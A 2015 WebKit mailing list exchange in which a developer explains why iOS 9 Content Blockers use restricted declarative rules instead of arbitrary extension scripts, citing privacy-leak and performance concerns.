[webkit-help] Content blocker vs filtering

Mon Jul 6 16:37:21 PDT 2015

On 7/6/15 11:46 AM, signup_mail2002 at yahoo.com wrote:
> I am wondering is webkit's content blocking extension framework
> different then the network content filtering announced for ios9?

That's a very good question.

The content blockers design is quite different from the regular network 
filtering APIs.

Usually, network filtering is agnostic of the type of content. Most of 
it is done at the level of network layers, some filtering is done with 
raw content.

On the other side, Content Blockers are at a very high level in the 
stack. They have deep knowledge of browsers concepts, they know about 
frames, the type of elements making requests, etc.

Content Blockers are independent from network layers. They do not know 
anything about IPs, what protocol do, or anything like that.

> I am wondering if this can't be combined in functionality somewhat.
>
> First of all all browsers on iOS has to use WebKit (as far as I know) so
> an extension would or could apply to all iOS browsers right?

I don't think all browsers use WebKit but yes, in theory any browsers 
using WKWebView could enable extensions.

> Secondly a simpler content blocking is via URL/IP matching using local
> or remote blacklist (no way this can be created via JSON rules - too
> big, and how can these be updated efficiently) So WOT, SiteAdvisor,
> LinkChecker, Safe Web, etc.
>
> What these plug-in do in general
> 1)URL/IP scanning (i.e.: category base blocking, parental control)
> 2)content scanning (AV and Ad scan usually)
> 3)link annotation (same as #1 but ads info beside the link as a visual
> annotation). This require a way to modify content (iOS is the only
> platform where this is not possible without resorting to VPN/Proxy which
> is costly and slow)

Network level blocking is not really in the scope of WebKit. You should 
file a radar at http://bugreport.apple.com with your use case.

The network on iOS and OS X is provided by system services and 
frameworks. WebKit just use them.

> Basically we need the following entry points:
>
> 1) configuration for block page, whitelist/blacklist (exception list
> that are mutually exclusive I imagine). If you define RESTful protocol
> for filtering on URL/API and you do the caching (remember this can be
> used for parental control because it contents site categories and
> dangerous info) then we can simply provide a URL and define
> authentication mechanism (ex: access token). This makes things simple
> for page blocking.
>
> 2) before page load get event to decide if page can be loaded. URL/IP
> info is needed. If WebKit uses REST model then we just configure the
> back end info and WebKit will handle everything else.
>
> 3) before page is shown after page is ready, give event for opportunity
> to inspect the page or modify the content ( we are all sandboxed
> apps/extension there should be no restriction on what we can do). Having
> DOM obj of the page would make things easy or allow injection of
> JavaScript. If this is done at network level MITM attack would be used
> to decrypt HTTPS traffic (used by most if not all Enterprise grade
> filtering proxies) and not something I like particularly.

We had good reasons not to do that.

Let me first respond to the idea that we can let arbitrary programs 
interact with pages if they are sandboxed. That is a capability we would 
really like as it gives a ton of power to developers, but it is not in 
the best interest of users.

There are too many ways to abuse the system and leak personal information.

For example, let say we allow an extension to run JavaScript 
arbitrarily. Such extension could easily wait for you to log in your 
bank and use XHR to send all your information to a server.

Let's say we forbid JavaScript but allow DOM manipulation. Some websites 
use the values of attributes to define how they send they own XHR. If 
your extension change them, you can start stealing user information.

You can also just URL encode the information you want to steal and use 
it as the source of an image.

Allowing arbitrary change would just put us in a whack-a-mole situation 
where they is no clear path to protect users.

--

Another important aspect is performance. Classical extensions have been 
introducing important delays in page loading.

In the new model, we do not have Turing Complete machines but severely a 
restricted model. As a result, we can ensure a very small overhead by 
default.

Extensions are losing a lot of power with the deterministic machines, 
but the results is multiple order of magnitude faster. In my opinion, it 
is great people won't have to chose between privacy and performance, it 
is possible to get both.

> 4) if a page is blocked but is allowed to load there must be mechanism
> to allow the page to load without going into an infinite loop (I.e.:
> temporary unblock)
>
> I think JSON format is good for simple static logic but not necessarily
> flexible enough for all cases. In my opinion it is not very future proof
> (let 3rd party worry about the filtering/block logic).
>
> Let me know if there is another mailing list for content filtering that
> I am talking about or I am missing something about this new feature.

As a final note, as you may see with iOS 9, iOS extensibility is a very 
active area of development.

My rationale for Content Blockers does not make your use cases go away. 
We want to know about those use cases and find ways to do better. Please 
file bug reports at http://bugreport.apple.com explaining what problems 
you are trying to solve and why Content Blockers are not a good solution 
for you.

All the feedback helps us continuously improve iOS.

Cheers,
Benjamin